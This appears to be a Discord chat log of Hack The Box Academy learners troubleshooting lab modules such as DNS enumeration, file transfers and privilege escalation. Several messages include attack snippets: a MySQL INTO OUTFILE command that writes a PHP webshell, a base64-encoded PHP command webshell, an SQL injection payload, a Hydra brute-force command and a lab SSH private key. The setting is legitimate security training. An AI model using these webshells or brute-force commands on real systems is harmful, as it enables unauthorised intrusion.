#modules

Right I get that, but the answer options are “not suspicious” “escalate” or “consult IT operations” .. I figured after completing the whole thing they would have some explanation as to why each answer was chosen. Since to me one might seem like an escalation but it ended up being consult IT, but I don’t really know why

Keep digging. You look at the other pages like author? I don't have my notes for that module off hand but I do remember being really frustrated with THAT question and finding the answer on a page I wouldn't have expected.

It just depends on what you found, as it could be benign traffic thus consulting IT is the way to go

The skill assessments don't generally offer any sort of explanations

It's mostly meant to be based of knowledge and the module material, maybe something in the material pointed to it -- but you overlooked it

I just went back and did the manual enumeration methods they taught, i was able to find the answer you're looking for. specifically curl with 3 different grep inputs

it is something you get a feeling for over time and sometimes the answer is not black or white. Is there a specific question where the answer confuses you?

hi my virtualbox refuses to open the VM issuing error
"Result Code:
E_FAIL (0X80004005)
Component:
SessionMachine"

is this happening to anyone else, this time yesterday it worked and i havent changed anything. No updates, file access isnt a problem

Humf, Can't reach the IP of the section.
And can't spawn pwnbox

Try resetting your Host

Skill issue (are you connected to the vpn?)

Yes VPN is connecting ok.

2024-03-20 15:38:47 Initialization Sequence Completed

Does ip a only show one tun0?

yes only one tunX device.

ive tried it, as well as disabling Hyper-V and a few other things nothing seems to work. I also restored to an earlier snapshot and it didnt achive anything

for the active infrastrucre identification they gave me 2 vhosts to use but I can't access them on my machine am I supposed to add them to the /etc/hosts file or something? They didn't give me ip addresses to them or am I making this more complicated than needed?

IP is the TARGET IP that you spawn
so example you add into /etc/hosts

<TARGETIP> app.inlanefreight.local dev.inlanefreight.local

Thaank you

same applies to hackthebox
like they have other .hackthebox sites aswell under their table
academy.hackthebox (for academy)
app.hackthebox (for Labs)
etc

maybe easier to understand if you think about hackthebox

if you suceesfully added to the hosts you can visit the website and it wont throw you an error anymore example

did I do this right because I'm still getting the error?

yeah. for future reference you can just do them both in one line, 10.129.245.118 app.inlanefreight.local dev.inlanefreight.local

i would double check the box didn't die off due to being up too long, and make sure you're on the vpn

I'll double check but I originally just put it on one line it just kept giving me a error so I tried 2 lines

^

You just need a space between them

you can see it already doing it with ::1 and localhost, ipv6-localhost, and ip6-loopback

But it doesn't hurt to have them on separate lines

yeah it's the same difference but it'll just help not having to put the ip every time

It's working now

Just makes your file cleaner

also not sure what box you're on but sometimes it takes a few minutes for the boxes to spawn even if they're online, because the services etc can take some time to launch

That also can be a factor

I think that's what it was

@fringe urchin are you doing the whole cpts path or just some modules from it?

Full path. Want to get cpts cert

So I am in the Shells And Payloads Live Engagement Module, one question, is the host that you RDP into just not supposed to have a web browser?

there is a web browser

I got the correct answer for the cms but a little still confused on what a cms is

CMS is a content management system, it lets you build websites without prior knowledge of code, so you don't have to code the site. like wordpress.

firefox

I do not see it anywhere

Type it in the terminal

Idk if this is off topic but i saw a linkedin post its like a prolab? Named hailstorm/cyclone/blizzard may I ask are those part of the prolabs subs or what? Its my first time hearing about them and im ineterested!

Not working, connection refused.

In the terminal of the jump host they give you

I think those are enterprise prolabs, so no dedicated channel for those, I suggest reading and following #welcome to access more of the server

well did somebody can tell me how to get start in reverse engineering or get into modding
or making paid game available for free like pirate bay

i have learn c c++ and java

That’s what I’m doing

Well it worked fine for me when I did it

Remember they give you 3 targets to focus on

We dont advocate piracy here read #rules and #welcome

alright brother

About modding games hackthebix academy has a module about that. No clue how good it is tho

https://academy.hackthebox.com/module/details/208

It's basic reversing

Ah

Not so much for AAA games

Most of them run denuvo either way💀

Yeah so am I supposed to rdp to each one of these from the foothold machine? Good lord

No. They all are interactable in different ways, none require a second rdp

Ok well I need a web browser and nothing is here.

Yes there is

It's just not in the gui to click on

Open a terminal in the host, type firefox hit enter

No protocol specified
Unable to init server: Could not connect: Connection Refused
Error: cannot open display: :10.0

Are you rdp or ssh into the foothold

Cause that's just odd

Used xfreerdp as instructed

Weird, and you're not trying to open it with root. Yeah?

connection refused, confirm ip and port

Maybe target went offline? Refresh the htb page?

Well if they're just launching firefox with no arguments, it shouldn't give any error like that

if the target was offline you wouldn't get a connection refused

Well they're connected to the foothold host

has to be online to get refused

Oh yea i though thaz error was from rdp

And the targets for the Shells and Payloads module - Live Engagement are on an internal network

I shall stay silent

Yeah it was root 🤣. Fml lol

you almost never have to be root; if you do just use sudo

Yeah I su’d to herb-student. It just gave me root when I logged in didn’t realize it

Htb-student *

history

https://tenor.com/view/chillbro-cat-котик-котик-моргает-gif-10925748526361103416

lol

Yeah subdomain active enumeration is stumping me with the text records tried nslookup and dig and got nothing
Maybe I'm using the wrong domain 🤷🏿‍♂️

sometimes you gotta look within

Hello

Going to have to really process that one

don't think too hard on it

if you didnt get the flag then yea wrong subdomain

its in plain sight

first time seeing an optional exercise, are they worth doing or its just there so you COULD try out all other methods from File transfer that you didnt get to use in the 2 questions above?

they're worth doing imo to understand them

right so i see how other stuff works. yea i figured better to ask if they are worth here since i saw you talking that most ppl just skip em ty

as has been shown multiple times in here, people forget the basics of file transferring

and it's good to at least understand different methods, that way if A fails, you still have B

yea right

and its better to have somehwere a screenshot of a working B transfer

so you dont need to troubleshoot on another host where its example blocked

hi im in linux pass the hash section, ive got the flag but it is malformed

what should i do

it sounds like it may have gotten malformed in smbclient can you read the file?

nvm i just realised it was a fake flag

the real flag is at the user directory HAHAHAH

imagine that's the file for another challenge though

using print? i tried print but no access 😭

print prints it to a local printer iirc

you can do like type or more

remember SMB is a windows based protocol

nope both method wont work

dork

i meant connect with smbclient directly

don't download files or do anything fancy

just connect, and don't send the command flag

perhaps it's treating the file weirdly

iirc this one was a bit silly

also aren't you meant to be connectiong to carlos's share for his flag?

https://academy.hackthebox.com/module/147/section/1322
hey they are cred of the Kira have disappeared I tried to mutate the password of the user kira and to authenticate impossible

that's highly unlikely

ooo okay

nope i just solved it yst

the pw for the ssh key is different from her pw

We agree that there is a module that asks you to log in with the user Kira and his password love? from memory I don't remember it I can't find this section, but I made it.

what are your views about Indian hackers?

there is a section that references using their password to obtain credentials for another user

but none of the answers contain her pw

take this as a lesson to always save credentials you find

@fathom pendant wanna answer the question I asked?

lmao

Anyone?

I don't have an answer for you nor is this the place to entertain that discussion

as I don't really get the underlying question: if you're referring to scammers, they aren't hackers

i wish they'd block this channel off without going through #welcome first

Nah I m not referring the scammern

Scammers! **

then I don't get the point of your question, aside from potentially being racist

You are in the wrong channel for this question.
Read and follow #welcome and ask your question in #general

@acoustic owl It redirected me here!

no it didn't

It actually did!

this is just one of the few channels you can see without being verified

@bright robin No, it didn't

Read and follow #welcome

Oh ThnQ

this would be a snort keyword, and you'll want to include the ; at the end. To give you a quick refrence you can look at the list here:
https://docs.snort.org/rules/options/payload/http/

can I get another hint on finding the txt record? every subdomain I use I get an't find inlanefreight.htb: No answer

Can you tell me which subdomains you already tried

I'm pretty sure I tried all of them I think and I'm using the -query=TXT

would you still need to put the ip address after the domain?

i'm going to switch to using dig instead see if i get something different

Ive been arguing for this for over a year now. Sadly it aint happening anytime soon

Yea

Well with dig yes

damn lol I'm really not understanding anything but the first 2 questions for this one

So i just checked and yea the flag can be acquired both ways. With dig and nslookup

and here I thought I would be done with this module today lol

in the client-side validation when i modify the HTML and remove whats inside the onchange and try to upload it works but the source comes to me as base64 and i get something like that data:application/x-php;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==

Can you show.me the command you used

Yea but wrong subdomain

Well shit

If the flag isnt there its the wrong subdomain

Okay will keep looking

There is like what around 20 subdomains iirc

What module/section?

file upload - client-side validation

First two? Like the how many zones there are? Well that just means how many of them are zone transferable like axfr, its a small number

Yeah I got the first two questiong right but they aren't helping me with the rest of them and I know for a fact now I tried every subdomain from the axfr one I used

They all give me this

You need the IP behind aswell

<@IP>

Oh its nslookip

Withoit @ then

Just the <IP>

Just because you have access to it doesnt mean other tools like dig etc can resolve the correct ip thats why you need to specify it

I think I need to revisit my footprint notes on DNS ik this shouldn't be hard but all these questions are getting me

If you add the IP at the end you have the correct syntax but wrong subdomain

yeah, the module has you use nslookup, which is alright, but dig is far better

but either one you need to specify the name server you're querying

You need to follow the module to a T, once you have uploaded the "image" you will have your shell

Another q do I need to put the target ip in my etc hosts for the other questions 🤔

If the section doesnt specify it then no.
Maybe in later modules it wont tell you

Got it

I would suggest first finding the correct TXT zone for the question. Before going for 2 questions that are after it

Okay will do that then

Doing Modern Web Exploitation Techniques, SQLi websockets section. I'm trying to follow along in the module, but the victim box isn't behaving like the module shows. It says to enter " UNION SELECT "1 which I do, and in the example it shows a successful SQLi, but when I do it, it adds a backslash before the double quote. The module doesn't say anything about this or bypassing it. Am I doing something wrong? I feel like this isn't the intended behavior of the victim box. Green is example. red is following the example.

sqlmap is also unable to exploit it, but the module says it can

You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer., attacking common services, i am logged into the mysql server,,,but i dont get it what i have to do next...

What section?

Skills Assessment the easy one

Check your rights, you have write access

So you may be able to get RCE no? 🤔

||MariaDB [test]> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
ERROR 1 (HY000): Can't create/write to file '\var\www\html\webshell.php' (Errcode: 2 "No such file or directory")||

it seems like i do not have write access?

"no such file or directory"

^ Everything you need can be found in the txt file from ftp including the right webroot directory.

aaah oh my god. never would have thought at tht note. thx

so this is the list of subdomains I'm using to find the txt record is this the correct list I used dig axfr inlanefreight.htb @targetip

Yess one of those is the correct one.
The target IP is the IP on the website and not the ones of the right side. Just in case

ahh so I was supposed to use the target ip for each sub domain

I was using the ips given in the list of zones

use the one from the website for all

still lost on the other questions but feels good I'm done with that one

Have you found out where the txt is?

yes

Then for the next questions you can use that specific one

tracking will do

You're already on file transfer right? I feel so slow lol

Yea.Im only doing like 2-3 hours per day since I'm in a diff country

Everyone should go their own speed

Im not going fast either

Im pretty much like that as well and I get that

question for anyone cpts path is more tailored toward network penetration testing vs web correct with a little web or am I looking at it wrong?

Hello

Right.

Hey

hello

can i dm you?

ok sure

Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)

apparently nothing is right i don't pivot with metasploit

hint it's the one with the same 3 octets

i tried the two 172s

guess this is another one to skip

it's asking for ip/mask

thank you lol i wish it woulda just said that

So I'm doing the virtual hosts part and am using ffuf with seclists namelist.txt to find subdomains but the list came out huge however that is what I assumed they wanted us to do am I at least thinking correctly on this one?

Ok yea i went and looked at the correvt questions. Mb
So yea ffuf is being used, yes the list is big but a lot of them are just default installation pages. So you want to filter them out

In the module its explained already how to filter them iut via size

good hint

Hey all with the question: "Study the following resource https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html to learn how WannaCry performs shadow volume deletion. Then, use yarascan when analyzing "/home/htb-student/MemoryDumps/compromised_system.raw" to identify the process responsible for deleting shadows. Enter the name of the process as your answer. " i dont think i quite understand the question i know how vss works but that dont seem to be right answer can anybody help me with a hint ? 🙂

vss was initiated by another process to delete the shadow copies

Im working on "Windows Privilege Escalation Skills Assessment - Part I" and I got printspoofer on the target and nc.exe, it keeps giving me the same error but recognizes the impersonate.

try another tool

if you wanna use printspoofer don't go for blogs on google

just go to Windows PE module --> SEimpersonate section

and follow their command

Anyone on an iPad

I wanna knock out some modules

I did but I’ll look into the other tools they used as well thanks

Good luck 🍀

Thanks brother cuz I need it damn

do u guys take notes of what u figure out in labs too?

it's a good way to understand the mindset

saves re-googling stuff or needing to re-remember something

i tried to use evilwinrm to get access to host 1 and now i want to get shell to host 2 which is inside the internal network, do i need to do pivoting because i tried to nc host 2 via host 1 and got the shell but it is not interactive (do not get any response)

I had so many problems with that lab

I had to reset it many times

my lab?

Yeah

Are you doing the pivoting portion of academy?

The CPTS path?

yes you'll need to set up pivoting to access any other internal hosts from your primary

it's not strictly required for the lab, however

no im doing pass the hash windows

which ill need to access to DC01 from host 1

you can PtH from other tools within the host; but also i believe with the windows boxes you can usually RDP to them

yes i can rdp just want to know why direct nc wont work

if you don't want to follow the question instructions, psexec should work, you'll need to pivot tho

thanks for the info

imo passing the hash from one windows machine to another to get a revshell kinda defeat the purpose since you can usually directly autenticate to it

im on pth linux, i cant find the keytab/cache for linux01

use find to search for the keytab

tried

well its there.

ooo i see

its not necessary to be named as linux01.keytab

it just doesnt have LINUX01 attached to it xd

xD

Linux Local Privilege Escalation - Skills Assessment

i found the flag 4 and now have a website with user T and i want to get a reverse shell from the webshell i uploaded to use it to escalate my privellege can someone give advice on how can i get a reverse shell from here?

do i need to put my password in a text file? or is this command indiccating what file to download? its saying Now we can begin transferring files. We need to specify the IP address of our Pwnbox and the username and password.

scp user@ip:/file/path /local/path

decided to do http server and curl it, but thanks forr that adding to my notes 😛

also works for upload
scp <local path> <user>@<ip>:<remote path>

@next bronze and youre using ur tun ip from the openvpn right?

you just have to start an ssh server on ur machine forr this

no, you connect to the target ip

for the download one* for this lesson i had to ssh into target and download a file to use hasher

i still use target ip? or my box for the ip for downloading

the box ip

got it thanks !

it also works the other way around if you want to run the ssh server, just that you need to swap the upload and download

Hello! I've been stuck for hours in Command Injection / Skill assessment, someone could help me please? or a hint? it's about the following:

||if I am not wrong, at the injection part, the application tries to do some action, BUT, the thing is that every command that I try to inject (obviously in an obfuscated way), it tooks me like for example: 'cat' is not a directory, 'mv' is not a directory...
Alright so I'll use flag.txt to move taking it's own 'mv' mechanism of the web app but...* Permision Denied * ||

SOLVED!
But Holy Sweet baby... what a Lab

Can anyone provide insight as to why this is happening? I think it may be because how strings in JSON are handled, but this doesn't seem to be the intended behavior. how do i get around this?

honestly feel like this one is actually broken

anyone?

What have you tried to get a rev shell?

Intro to digital forensic : Skills Assessment
question4 : Determine the folder that contains all Mimikatz-related files and enter the full path as your answer.
Hint : Enter the parent folder of either "Win32" or "x64".

could anyone help me on this question ,iam stuck at finding around the collection had given in the machine to find the folder related to mimikatz

**Module: Attacking Common Services, Section: Attacking DNS, **Question: why does subbrute not able to resolve the subdomains for inlanefreight.htb?

resolving hostnames has nothing to do with a specific application, but instead how your resolver resolves those hosts. if an app isn't able to resolve it, it means your resolver can't. in this case, on a private network, your computer would need to call out to the internal nameservers within that private network to resolve the hostname. that's why you just add the hostname to /etc/hosts, because it forces your computer to resolve those hosts you have input there into the IP you chose. so it's not resolving it because your computer's nameserver is likely calling out to your public ISP's nameserver to resolve the host, which it can't because the public nameserver has no idea what your private hostname resolves into.

the modules i've worked on that require several subdomains to be resolved have given me those hostnames and told me to add them to /etc/hosts, so maybe you missed that part

I have added the target-ip into the resolvers.txt in the subbrute dir, and ran ./subbrute.py inlanefreight.htb -s names.txt -r resolvers.txt

gotcha

sometimes tools don't always pick stuff up and you have to use another tool

and i did add the ip into the etc/hosts and name it inlanefreight.htb

or did i miss out smth else haha

the resolvers.txt tells your computer which nameservers to call out to, so when using that syntax you actually do call out to hackthebox's internal nameservers, so you should be able to resolve them without them being in /etc/hosts.

which hostname are you unable to locate with subbrute

i could not locate inlanefreight.htb with subbrute

which question are you on

the only question for Attacking DNS: ```
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

one sec let me try

appreciate it 🙂

can somone help me download hashcat

Okay i got the flag again. can you show the contents of resolvers.txt

remove the ip from your hosts file, it's not required for this. you use that ip as the nameserver only

Ok can I pm u?

yeah

Does anyone know how to proxy nmap thru burp or ZAP.
proxychains.conf has been changed to the include 127.0.0.1 8080
proxychains nmap .....etc
and
nmap --proxies http://127.0.0.1:8080 .....etc
both complete but nor ZAP or Burp capture any traffic

if proxychains is configured you just use that command. like: proxychains nmap -sV -sC 10.10.10.10

Thanks got it now ! 🙂

I tried that, but I still dont see any intercepted traffic in Burp or ZAP. But I tried proxychains curl --cacert /selfsign/dir/loc https://site.com and that works no problem. I see the get request and response but for some reason I cant see nmap traffic

sorry I'm just new and want to learn how I can start instance? It says Free users are allowed 1 Pwnbox spawn per day.

Just click the green Button

@acoustic owl can you confirm if modern web exploits sqli section is working as intended?

i honestly think it's broken

check what if you can access with the creds you have, maybe some shares

I'm only on my cell phone and can't test it at the moment.
If you think something is not working as expected, please contact support

lol the contact page says go to discord

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

There is no official support on Discord.

I see, the help center is not available on academy, only apps.hackthebox.com

i can see it over there

You should see the green bubble also on the academy page

i'll have to deal with it later, it's saying i have adblock which is preventing me from contacting support. i disabled ublock and pihole and it still doesn't work.

you can just ask here

Yea check what you can access with the creds you have

holy is it my problem or htb currently

Did you mange to solve it? I am stuck there as well.

This can be your network, it can be the HTB server or anything in between.

alright thanks

Hi

@next bronze Got it, I have to say this was one of the hardest steps in skills assessments what I have encountered in htb academy.

Anyone else having laggy latency on HTBA?

It's much more laggier with ping then usual

whats this error?

I don't see any errors

it wont crack the hash

look at the time it ran

0:00:00:01

solved ahhahaah

Hey everyone 🙂
I'm stuck in this question since a couple of days.
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

its in the ATTACKING COMMON SERVICES --> Attacking DNS module.

I ran python3 subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt after i added ns.inlanefreight.htb and ns1.inlanefreight.htb to the resolvers.txt.

after an hour or two i got these subdomains:
inlanefreight.htb

so this is what my /etc/hosts file look like now:
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

10.129.103.34 inlanefreight.htb

i can't perform any zone transfers ... and i dont know exactly know what to do next.
any tips ?

There's an important tip you may have glossed over in the module. ||you can perform a zone transfer attack on subdomains||

one of those subdomains is correct, and I suggest removing that part of your message, as that's a spoiler

you also don't need to add them to your /etc/hosts

(it's not a guarantee that those subdomains are even on the same IP)

I see, thank you both 🙂
I will try again

dig - @ip
nslookup - add the ip after the subdomain

you're still querying the same server

okay i see 🙂
thanx alot

Trying to get another perspective on Module: Attacking DNS, Question: Why can't the subbrute.py working as it should be? ```
./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt -v

resolvers.txt only contain the target ip

looks fine to me, you added -v so there's a bunch of extra info

yeah it does work, mine works fine

you have something wrong in resolvers or names

but aside from the verbose info

nah, it's just verbose

oh true, don't use verbose lol

gogo

its not failing or anything just showing extra info that's irrelevent

so instead of clean output it's messy/all info of every step

power rangers?

Module: File transfers
Linux File Transfer Methods
So after upload the upload_nix to the server i wanted to unzip i manage to do it without many problems but want to know what other people use/prefer if on the system is not much installed?
like unzip and jar didnt work since they aint installed so i wrote a quick python3 script that unzipped it
are there any other methods that are better?

(in a scenario where you NEED a zipped file on the server)

gunzip

just tried it out, had to rename zip to gz then it worked and gave me the same hash as the one with my python3 script. looks less of a hassle lol

ty

haha definitely

Tar prob would have worked too

unzip should be a default command

but idk, been a minute - i don't recall issues with unzip

in that exercise we had to ssh into htb student acc and unzip wasnt installed

sudo apt install unzip
[sudo] password for htb-student:
htb-student is not in the sudoers file. This incident will be reported.

You wouldn't be able to install anyway

The labs aren't internet facing

not connected to the internet i assume as many others

yea ok ic

Hello, I've encountered a problem with the "Attacking Common Services Module" in the Attacking SQL Databases section. When attempting to connect to the database using the provided credentials, neither sqsh nor mysql are successful; only mssqlclient.py establishes a connection successfully. Additionally, I'm experiencing connectivity issues with the target machine, as it loses connection every few minutes.

Yes, mysq won't be successful against an mssql database- connection issues however, try changing vpn regions and using tcp vpn

I'll give it a shot, thank you very much for the suggestion!

Where can I find the modules I liked?

i've been looking for it for an hour

dashboard

whatttt

the hell

i never even noticed on it

haha yeah i wish it had its own section

Hey im back again 😦
I'm sorry to bother you again, but i tried everything again ... and still no luck

From the module i can see that
dig AXFR @subdomain.inlanefreight.htb inlanefreight.htb is used and i tried it on all the subdomains i found. But im not getting anything other than : dig: couldn't get address for 'subdomain.inlanefreight.htb': not found.

I know MarcieLee told me not to add the subdomains to the /etc/hosts but i tried it anyways (out of desperation) and i got this output:
; <<>> DiG 9.19.21-1-Debian <<>> AXFR @subdomain.inlanefreight.htb inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

what's the name of this module

Because that's not how dig works

dig axfr subdomain.inlanefreight.htb @ip

You need to understand the command. the IP after @ is the name server (DNS) that you're using to look up the hostname. the second input is the hostname you want to look up. the correct command would be dig AXFR@<name server, which is the IP from the box you spawned> <hostname>

nslookup is the one that's positionally dependent

nslookup -query=AXFR subdomain.inlanefreight.htb <nameserver or ip>

thank you guys i got the answer 🙂
i will read the documentation about dig and nslookup .. this is important information that i should be ready for in the exam.

Hi all, bit of a weird one - I am going through the "Packet Inception, Dissecting Network Traffic With Wireshark" module (https://academy.hackthebox.com/module/81/section/789) - I've got question 2 answered, but question 1 is giving me issues.
I am just not seeing any image transfers on HTTP. I can see an image transfered over FTP, but that's not correct. The question hint gives 2 file names that I should apparently be seeing, but I am not. Starting to go around in circles now, questioning whether this is just a bug...

The @ for dig tells it what nameserver to use

In this case, you're using the ip/ns of inlanefreight.htb to query/ask the subdomain for information

Module: Attacking email services, Question: I am trying to brute force password for user m***** using Hydra but unsuccessful

Command: hydra -l m***** -P passwords.list -f <targetip> smtp/pop3/imap

Are you including the domain as part of his username?

Nope I didn’t

Try

Also idr if pop3s or imaps is running

Let me check back my nmap results

Ty!

yeah i understand this now 🙂 thank you very much

Has anyone encountered this issue before? Not sure how to solve it, and searching did not help much so far. It is related to the last question on Using CrackMapExec > Gathering Information with an Admin Account > Command Execution :

$ cat julio_keys1
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCrI/ReOZ1wcRKjjmJTiWnX9feoaU148N9zzx9HndCLlwAAAKDZV8HX2VfB
1wAAAAtzc2gtZWQyNTUxOQAAACCrI/ReOZ1wcRKjjmJTiWnX9feoaU148N9zzx9HndCLlw
AAAEAFMHScrsfTE72yeZbJB5CCOq+mf4M/T4EBHW99Gj3GEasj9F45nXBxEqOOYlOJadf1
96hpTXjw33PPH0ed0IuXAAAAGGlubGFuZWZyZWlnaHRcanVsaW9ATVMwMQECAwQF
-----END OPENSSH PRIVATE KEY-----

┌──(kali㉿CSpanias)-[~/htb/pentester_path/cme]
└─$ file julio_keys1
julio_keys1: OpenSSH private key

┌──(kali㉿CSpanias)-[~/htb/pentester_path/cme]
└─$ nxc ssh 10.129.204.178 -u julio --key-file julio_keys1 -p '' -x 'type ~\desktop\flag.txt'
SSH         10.129.204.178  22     10.129.204.178   [*] SSH-2.0-OpenSSH_for_Windows_7.7
SSH         10.129.204.178  22     10.129.204.178   [-] julio: (keyfile: julio_keys1) unpack requires a buffer of 4 bytes

Thanks in advance!

how to open a word document that is password protected?

libreoffice and xdg-open dont support password input

Libreoffice do

As long as your key file is correct that should work. try CME not NXC. Looking at my notes CME worked without any issue.

-p? i tried but cant

Have you tried entering the password

I opened it in gui

oh

my libreoffice corrupted

On the Module Cracking Passwords with Hashcat > Identifying Hashes - Which format should the answer be? I've found the hash but its not accepting any versions of the answer

i havent looked at it in a long time but is it asking for the mode number?

or the name?

just say 'Identify the following hash:

ran hashid but its not accepting the answer :/

hmm, i'd need to look back at the module

Thanks, but it produces the same error:

$ cme ssh 10.129.204.178 -u julio --key-file ~/htb/pentester_path/cme/jul_ssh.priv -p '' -x 'type ~\desktop\flag.txt'
SSH         10.129.204.178  22     10.129.204.178   [*] SSH-2.0-OpenSSH_for_Windows_7.7
[13:52:49] ERROR    unpack requires a buffer of 4 bytes                                                           ssh.py:172
                    ╭──────────────────────────── Traceback (most recent call last) ────────────────────────────╮
                    │ /home/kali/.cache/pypoetry/virtualenvs/crackmapexec-ODn8AvZr-py3.11/lib/python3.11/site-p │
                    │ ackages/paramiko/pkey.py:525 in _uint32_cstruct_unpack                                    │
                    │                                                                                           │
                    │   522 │   │   │   │   │   arr.append(s)                                                   │
                    │   523 │   │   │   │   if f == "i":                                                        │
                    │   524 │   │   │   │   │   # long integer                                                  │
                    │ ❱ 525 │   │   │   │   │   s_size = struct.unpack(">L", data[idx : idx + 4])[0]            │
                    │   526 │   │   │   │   │   idx += 4                                                        │
                    │   527 │   │   │   │   │   s = data[idx : idx + s_size]                                    │
                    │   528 │   │   │   │   │   idx += s_size                                                   │
                    ╰───────────────────────────────────────────────────────────────────────────────────────────╯
                    error: unpack requires a buffer of 4 bytes

I will try from a parrot instance

weird that you're just typing cme and it's calling to poetry and venv

I have put an alias in my bashrc file!

try running it normally outside of the venv or something

got it

ok

probably had a typo or something

It works fine on the Parrot instance. I will default to that when trying things from now and on. I have spend too much time troubleshooting for nothing 😭

it happens! glad you at least narrowed it down and could complete the task

Something is messed up with your venv instance probably

Yea, I have worked through the whole CPTS path without issues, but on the CME module I have many issues that seem really weird.

is it best to get CPTS or Academy to study for OSCP?

If it's been disabled definitely go to insta support

Otherwise, nothing we can do for you brother

bruh they wont respond to anything

ive sent so many emails

Hacking Instagram is not something we can do

do u guys know how to code me out of it>

I suggest not breaking platform ToS to get your account disabled

OSCP teaches you to pass OSCP. Academy teaches you to pass CPTS.

Read #rules and #welcome , you're requesting an illegal service

im trying to study for OSCP. right now im using free HTB but in 1 week I want to either get the Academy, VIP HTB or something else

oh i didny know

CPTS helps you crush OSCP

trying to decide

If you want to pass OSCP, you should just take their course. They teach what you need to know for their course, just like every platform.

does any1 know herer that has any type of contact with some1 that works for insta\

tried it in 2020. still have the notes

No, now stop asking

I heard they've massively revamped their course since then, so that's probably out of date.

This isn't even remotely the appropriate channel

yeah I don't want to shell out 1 grand again

or more I think

did we travel back in time?

ok, but if your plan is to get an ocsp cert, you need to buy their stuff.

yeah the retake fee for sure

now is oscp worth it is a whole other question. you cannot beat the price to value ratio of htb, the content here is top tier

but you're asking 'i want to pass course a, should i learn about b to learn about a?'. like you're asking if taking sec+ will help you pass net+.

ok well

i guess ill just get the academy to help me

the content is all still relatd

related. its all cybersecurity

yeah but they're going to have different standards for things, like reporting

if you want to get a specific cert, then you should study the course for that cert, not some other course, it doesn't make sense

if your goal is learning cybersec, then yeah sure it doesn't matter, but that was not the premise of your question

im getting a lot of diferent answers

and idk why you're arguing it when you're the one who asked the question lol seems like you already made your mind up

well everyone but me is wrong

wtf? im not arguing at all

just saying that there are a lot of different opinions on it

Cpts modules make you ready for oscp but that doesnt mean you should go for the cpts course, not take it but take oscp instead

If you want oscp cert go for the oscp learning modules. If you going for cpts go for the htb modules

if you're using the CPTS course to study for OSCP you might as well just do the CPTS exam

and then go do OSCP

it's a win-win imo

i have a question in the Linux fundamentals module: "what is the name of the last modified file in the "/var/backups" directory? i use the cmd 'ls -la -t' which works fine. but then i saw 'ls -lat' which gave me the same results. if i am adding options to a command, lets say hypothetically 'ls -la -t -a -b -c' i can combine them like so: 'ls -latabc'? if so, does this work with all types of commands?

yes, you can, doesn't work on all commands though

thanks. that is pretty awesome to know

crackmap winrm is hydra rdp?

is that a question

yes

winrm and rdp are separate protocols

ah shit

winrm = windows remote management
rdp = remote desktop protocol

winrm is gonna be CLI access

ooo

cmd i suppose

well it's usually set up to drop users into a powershell session

oo its powershell

you'll know if you have the PS in front of the current working directory

actually how hard the exam is compared to the practice labs on the scale 1 - 10? or i shouldnt ask

PS C:\windows\system32>

that's mostly a subjective question

the exam won't have leading questions that point you to the method of obtaining the flags or even users

ngl im not confident at all since i struggle even on labs

aaaaa

i'll give you some freebie users, root and administrator

thank me when you pass the exam

the biggest pre-test is gonna be doing the Attacking Enterprise Networks module completely blind

okay will do

pace yoursellf and go over the modules when not confident to fully digest it

as in; just spin up the lab and go for total network compromise. don't read questions, and try to limit yourself on asking for help

it's why it's one of the capstone modules

do 200 htb machines

dude i see so many people stressing over the CPTS is it that hard/

i aced ejpt but now im worried

well i don't think anyone's going to say it's easy

ejpt is nothing compared to a cert like OSCP or CPTS

the standards are really high, so be thorough and know your stuff

yeah that too

both are regarded as intermediate skill based exams

OSCP is mostly only tough due to it's time restriction and tool restriction

CPTS is tough because it's a 10 day exam to go from start to Domain Compromise AND write a professional-grade report in that same time

hi

and their training. at least their old stuff. i've heard mixed reviews of their new course.

i've heard it's better, but the CPTS material is just better

yeah it's top tier for sure

I'm probably just missing something in the modules, but I'm on the first question section of SQLMap essentials and I cannot figure out how to enumerate a table. I haven't found anything in the instructions.

so i have 10 days to compromise AND write the report?

i thought it was an additional added on to when you finish the exam

Hey can some help be provided I'm doing the attacking sql databases section from attacking common services I managed to login using the given credentials in the beginning using msqlclient.py but I can't run any commands

What are you enumerating for?

I'm enumerating for the contents of a table

Just dump it

I'm trying to figure out the syntax for that. If I just put in the url and --batch and --dump it doesn't get the info I need

anyone know how can i install another linux on a device i bought tht already has linux and i dont know how to boot up a linux flash on that(ps:its a tv box)

You can add * at the id value to specify the location for the injection mark.

so like http://example.com/something.php?id=*

I'm in the
Working with IDS/IPS
Skills Assessment - Snort

There is a file named wannamine.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the Overpass-the-hash technique which involves Kerberos encryption type downgrading. Replace XX with the appropriate value in the last content keyword of the rule with sid XXXXXXX within the local.rules file so that an alert is triggered as your answer.

I'm currently checking the wireshark traffic and looking for || TGS-REQ || i'm not sure if i'm searching for the good thing and even if I am I'm not sure to understand the best way to find the XX

Yup, either or before the 1 or any value there.

In attacking sql databases part of attacking common services after 1 logs in using mssqlclient how to run queries in database I can't run any queries getting some error

"getting some error"

please be more descriptive

"getting some error" doesn't provide us details as to what the error is

Could not find storedprocedure show when I ran show tables command

because show tables isn't an mssql command

re-read the section for the mssql syntax

^ this. it shows the syntaxes

it could also be under the SQLCMD syntax

the syntax you're using is for mysql, which has completely different syntax

for Password Attacks Lab - Hard section
i cant move the file via smb, is there any way i can export the keypass and sam file

i tried to change the access to 1 also not allowed

